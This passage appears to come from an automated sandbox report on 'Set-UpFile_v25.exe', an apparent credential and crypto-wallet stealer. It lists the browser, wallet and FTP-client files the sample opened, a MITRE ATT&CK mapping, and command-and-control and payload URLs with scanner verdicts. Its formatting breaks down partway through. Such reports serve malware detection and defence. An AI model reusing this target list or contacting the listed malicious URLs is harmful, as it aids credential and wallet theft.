            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\ZTGJILHXQB
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\XZXHAVGRAG
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: Yara match | File source: Process Memory Space: Set-UpFile_v25.exe PID: 7272, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: Process Memory Space: Set-UpFile_v25.exe PID: 7272, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            MITRE ATT&CK matrix, listed per tactic (the count shown in the report for a technique is given in parentheses):

            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
            Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
            Execution: Windows Management Instrumentation (12), Command and Scripting Interpreter (12), PowerShell (2), Cron, Launchd, Scheduled Task
            Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
            Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
            Defense Evasion: Virtualization/Sandbox Evasion (221), Process Injection (1), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1), Steganography
            Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
            Discovery: Security Software Discovery (221), Virtualization/Sandbox Evasion (221), Process Discovery (2), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (32)
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
            Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
            Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels, Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
            Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://klipvumisui.shop/int_clp_sha.txt% | 100% | Avira URL Cloud | malware
            https://beattalkerz.cyou/apila | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/F | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou:443/api | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/api | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/api0 | 0% | Avira URL Cloud | safe
            https://klipvumisui.shop/int_clp_sha.txtf1R= | 100% | Avira URL Cloud | malware
            https://klipvumisui.shop:443/int_clp_sha.txt | 100% | Avira URL Cloud | malware
            https://beattalkerz.cyou/apibu | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyorT | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/4I | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/apijh | 0% | Avira URL Cloud | safe
            beattalkerz.cyou | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/apiF9 | 0% | Avira URL Cloud | safe
            https://klipvumisui.shop/int_clp_sha.txtcoded | 100% | Avira URL Cloud | malware
            https://beattalkerz.cyou/apilMQ-$ | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/apizp | 0% | Avira URL Cloud | safe
            https://dfgh.online/invoker.php?compName=user-PCx | 100% | Avira URL Cloud | malware
            https://beattalkerz.cyou/api9bf$ | 0% | Avira URL Cloud | safe
            https://klipvumisui.shop/int_clp_sha.txt.3 | 100% | Avira URL Cloud | malware
            https://beattalkerz.cyou/apic | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/y | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/apis | 0% | Avira URL Cloud | safe
            https://beattalkerz.cyou/ | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            cegu.shop | 185.161.251.21 | true | false | | high
            beattalkerz.cyou | 104.21.25.52 | true | true | | unknown
            dfgh.online | unknown | unknown | false | | high
            klipvumisui.shop | unknown | unknown | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://beattalkerz.cyou/api | true | Avira URL Cloud: safe | unknown
            rabidcowse.shop | false | | high
            wholersorie.shop | false | | high
            beattalkerz.cyou | true | Avira URL Cloud: safe | unknown
            cloudewahsj.shop | false | | high
            noisycuttej.shop | false | | high
            nearycrepso.shop | false | | high
            https://cegu.shop/8574262446/ph.txt | false | | high
            framekgirus.shop | false | | high
            tirepublicerj.shop | false | | high
            abruptyopsn.shop | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://duckduckgo.com/chrome_newtab | Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://beattalkerz.cyou:443/api | Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000889000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907710395.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000002.1962678644.000000000088B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://duckduckgo.com/ac/?q= | Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://klipvumisui.shop:443/int_clp_sha.txt | Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://contoso.com/License | powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://cegu.shop/ | Set-UpFile_v25.exe, 00000000.00000002.1966453532.0000000003683000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://beattalkerz.cyou/F | Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1920128987.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://dfgh.online/invoker.php?compName= | powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003713000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://beattalkerz.cyou/apila | Set-UpFile_v25.exe, 00000000.00000003.1876965792.000000000367F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://ocsp.starfieldtech.com/0D | Set-UpFile_v25.exe | false | | high
            https://klipvumisui.shop/int_clp_sha.txt% | Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl0 | Set-UpFile_v25.exe | false | | high
            https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://x1.c.lencr.org/0 | Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://x1.i.lencr.org/0 | Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/ | powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://beattalkerz.cyorT | Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000002.1962621793.0000000000807000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://beattalkerz.cyou/api0 | Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://dfgh.online | powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://klipvumisui.shop/int_clp_sha.txtf1R= | Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://beattalkerz.cyou/apibu | Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://dfgh.online/invoker.php?compname= | powershell.exe, 00000004.00000002.1970487568.0000000000760000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://crl.starfieldtech.com/repository/sfsroot.crl0P | Set-UpFile_v25.exe | false | | high
            https://support.mozilla.org/products/firefoxgro.all | Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://beattalkerz.cyou/4I | Set-UpFile_v25.exe, 00000000.00000002.1962621793.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://klipvumisui.shop/int_clp_sha.txt | Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://www.innosetup.com/ | Set-UpFile_v25.exe | false | | high
            http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://go.micro | powershell.exe, 00000004.00000002.1971280536.0000000004F58000.00000004.00000800.00020000.00000000.sdmp | false
                                                                                              high
                                                                                              http://ocsp.thawte.com0Set-UpFile_v25.exefalse
                                                                                                high
                                                                                                https://beattalkerz.cyou/apijhSet-UpFile_v25.exe, 00000000.00000003.1876965792.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://klipvumisui.shop/int_clp_sha.txtcodedSet-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://ocsp.rootca1.amazontrust.com0:Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://beattalkerz.cyou/apiF9Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003713000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://beattalkerz.cyou/apizpSet-UpFile_v25.exe, 00000000.00000003.1877000966.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1877228216.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://certificates.starfieldtech.com/repository/1604Set-UpFile_v25.exefalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.symauth.com/cps0(Set-UpFile_v25.exefalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://klipvumisui.shop/Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://ac.ecosia.org/autocomplete?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://beattalkerz.cyou/api9bf$Set-UpFile_v25.exe, 00000000.00000003.1908617857.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://crl.starfieldtech.com/repository/0Set-UpFile_v25.exefalse
                                                                                                                          high
                                                                                                                          http://crl.micropowershell.exe, 00000004.00000002.1969577811.00000000005D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://beattalkerz.cyou/apilMQ-$Set-UpFile_v25.exe, 00000000.00000002.1962621793.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.symauth.com/rpa00Set-UpFile_v25.exefalse
                                                                                                                              high
                                                                                                                              https://dfgh.online/invoker.php?compName=user-PCxpowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://klipvumisui.shop/int_clp_sha.txt.3Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://support.microsofSet-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003715000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://beattalkerz.cyou/apicSet-UpFile_v25.exe, 00000000.00000003.1790726742.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://beattalkerz.cyou/ySet-UpFile_v25.exe, 00000000.00000003.1877000966.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://beattalkerz.cyou/fSet-UpFile_v25.exe, 00000000.00000003.1920128987.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.remobjects.com/psSet-UpFile_v25.exefalse
                                                                                                                                      high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://beattalkerz.cyou/Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367B000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1804338671.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
